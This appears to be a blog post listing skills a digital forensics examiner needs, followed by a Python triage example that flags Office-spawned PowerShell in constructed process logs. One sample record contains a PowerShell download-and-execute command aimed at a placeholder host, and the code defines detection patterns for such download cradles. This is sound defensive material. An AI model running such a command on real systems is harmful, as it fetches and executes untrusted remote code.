Summer: https://www.digitalforensics.com/blog/skill-and-knowledge-in-digital-forensics/
The issues facing computer forensics examiners can be broken down into three broad categories: technical, legal and administrative.
Technical issues
- Encryption
- Increasing storage space
- New technologies
- Anti-forensics
Forensics is critically important to the incident response process and is useful for both routine and time-critical response. For example, in an incident where a company is dealing with a successful phishing attack, forensic processes can be used to establish facts such as who clicked on the link, who was successfully phished or compromised, and what information was actually accessed or taken. Computer forensics has become its own area of scientific expertise, with accompanying coursework and certification.
What knowledge and skills should a digital examiner have?
- Mobile forensics. There are a lot of mobile devices around. Luckily for digital examiners, the war between developers of mobile device operating systems has ended. Now 99% of mobile devices are running iOS or Android. Knowledge of the forensic artifacts of just two mobile operating systems allows a digital examiner to examine a vast number of mobile devices. Mobile devices store a lot of private data about their owners, which can be used to investigate crimes. Also, some mobile devices are vulnerable to malware despite the actions taken by the developers, which can lead to theft of private data by attackers. There are several good tools for extracting and analyzing data from mobile devices, but manual analysis will uncover more forensic artifacts on the analyzed device.
- Cloud Forensics. The cloud concept is very convenient for users. You can access your private information or working documents from anywhere in the world, without worrying that a hard drive in a laptop or desktop may fail or that priceless family photos will become inaccessible in a broken smartphone. Many cloud services allow the user to copy all of their information and files to a local PC or laptop for free. Examining the artifacts of cloud services on the owner's devices lets you establish which files were uploaded to or downloaded from a cloud, along with other information about the use of cloud services and the data stored in them.
- Drone Forensics. Drones are used more and more in everyday life. Investigating information extracted from drones will soon become a routine job for digital examiners. We already see the use of encryption to protect data in the memory of drones and the use of cloud services for storing information necessary for a drone's successful functioning.
- Windows Forensics. The vast majority of PCs and laptops are running Windows. Companies also often run servers on Windows. Researchers constantly report the discovery of new artifacts that can be used in forensic analysis. Therefore, knowledge of Windows Forensics is fundamental for any digital examiner.
- Mac Forensics. Of course, the number of Mac owners varies from country to country, but the general trend is that the number of Macs arriving at digital forensic laboratories is increasing. Knowledge of Mac Forensics allows a digital examiner to successfully examine such devices.
- File Systems Forensics. There are only a few basic file systems: EXT, FAT, NTFS and HFS+. Knowledge of what kind of artifacts remain in these file systems is needed in Windows Forensics, Incident Response, Data Recovery and Mobile Forensics.
- Incident Response. There are a lot of tools on the internet for hackers and penetration testers, and these tools automate the routine work of attackers. As a result, the number of incidents involving the theft of money or of private or financial information is constantly increasing, and the demand for digital examiners with Incident Response skills is constantly growing.
- Memory Forensics. This is a specialized area of knowledge that a digital examiner will not use on a day-to-day basis. However, knowledge of Memory Forensics allows significantly faster Incident Response, detection of malware, and decryption of drives and partitions. The examiner can also retrieve other data and files that reside in the RAM of the device under examination.
- Network Forensics. This allows detection of anomalies in the operation of computer networks and detection of an intruder. It is also used in the dynamic analysis of malware.
- Cyber Threat Intelligence. Hackers and pentesters can use a huge number of methods to penetrate a targeted computer or network. Knowledge of Cyber Threat Intelligence allows the examiner to narrow that whole variety of methods down to the few most likely ones. This reduces the response time to an incident and helps identify all compromised computers and other devices (for example, routers).
- Malware Forensics. Of course, a digital examiner does not have the same skills as a malware analyst. However, the knowledge of a digital examiner should suffice to understand which malware was involved in the incident (a compromised system usually contains several pieces of malware) and how the attack on the compromised system was carried out. For example, a typical attack on a computer looks like this: an email with a malicious document arrives at the email address of the computer's owner. When someone opens this document, it runs a PowerShell script that downloads an executable file (the malware). Understanding how the incident happened and what happened on the compromised computer requires knowledge of Malware Forensics.
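An added example, not from the original post, showing how the attack chain just described (an Office document spawning PowerShell that downloads a payload) can be picked out of process-creation records during triage; the Sysmon-style records, field names and command lines below are constructed for the example.

```python
import re

# Constructed Sysmon-style process-creation records (Event ID 1 fields),
# not taken from any real case.
SAMPLE_EVENTS = [
    {"id": 1, "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')\""},
    {"id": 2, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe Get-ChildItem C:\\Users"},
    {"id": 3, "parent": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -EncodedCommand SQBFAFgA"},
    {"id": 4, "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c echo hi"},
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}
# Common download-cradle cmdlets/classes and the encoded-command switch.
DOWNLOAD_PATTERN = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|start-bitstransfer",
    re.I)
ENCODED_PATTERN = re.compile(r"(^|\s)-e(nc(odedcommand)?)?\s", re.I)


def basename(path):
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return a list of reasons if the event is Office -> PowerShell, else None."""
    if basename(event["parent"]) not in OFFICE_APPS:
        return None
    if basename(event["image"]) not in SHELLS:
        return None
    reasons = ["office-spawned-powershell"]
    if DOWNLOAD_PATTERN.search(event["cmdline"]):
        reasons.append("download-cradle")
    if ENCODED_PATTERN.search(event["cmdline"]):
        reasons.append("encoded-command")
    return reasons


def flag_events(events):
    """Map event id -> reasons for every event that matches the chain."""
    return {e["id"]: classify(e) for e in events if classify(e)}
```

The flagged process IDs are the starting point for the rest of the examination: the parent document, the script it executed and whatever the download wrote to disk.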